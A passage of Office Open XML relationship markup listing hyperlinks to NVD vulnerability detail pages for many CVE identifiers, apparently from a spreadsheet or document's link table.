Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87534" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87544" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8778" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88018" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88278" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9163" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19274" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39821" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47705" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50540" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53546" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53548" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53552" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53649" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54523" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54694" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54725" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54754" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54755" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55085" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71193" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71319" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72737" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72877" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72878" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73300" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73843" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81048" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82100" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82107" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84333" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84352" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84353" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85042" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85047" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85050" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85085" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87438" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87448" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87455" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87464" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87470" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87474" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87488" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87492" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87494" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87500" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87504" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87512" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87520" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87526" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87527" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87528" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87529" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87547" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87558" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87581" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87607" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87609" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87621" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87634" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87637" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87638" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87643" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87646" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87650" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87654" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44950" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65639" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66066" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70470" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70477" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85216" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88062" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70141" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11841" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16242" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39975" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41242" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43114" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45272" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48088" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50561" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52777" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57580" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61410" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6223" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62668" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63221" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67305" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67330" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67336" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6881" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69254" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69256" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69259" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69264" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72841" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72842" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72879" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73653" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75925" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81046" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84200" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86123" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86148" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86149" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86151" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86153" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88285" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54356" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54391" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58376" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14813" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-31114" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71401" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15378" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16876" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19264" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21102" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25896" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41452" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44402" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44990" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45118" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4599" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47156" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47187" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47754" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48046" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48063" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48158" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48159" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48160" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48996" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51106" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52735" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53578" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53579" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53670" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53671" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55068" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55220" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55378" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56705" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57910" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61514" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61515" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62681" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62682" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62928" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63106" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64827" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65641" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66747" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66794" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67308" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67531" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67614" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68582" TargetMode="External" Id="rId454" /><Relationship 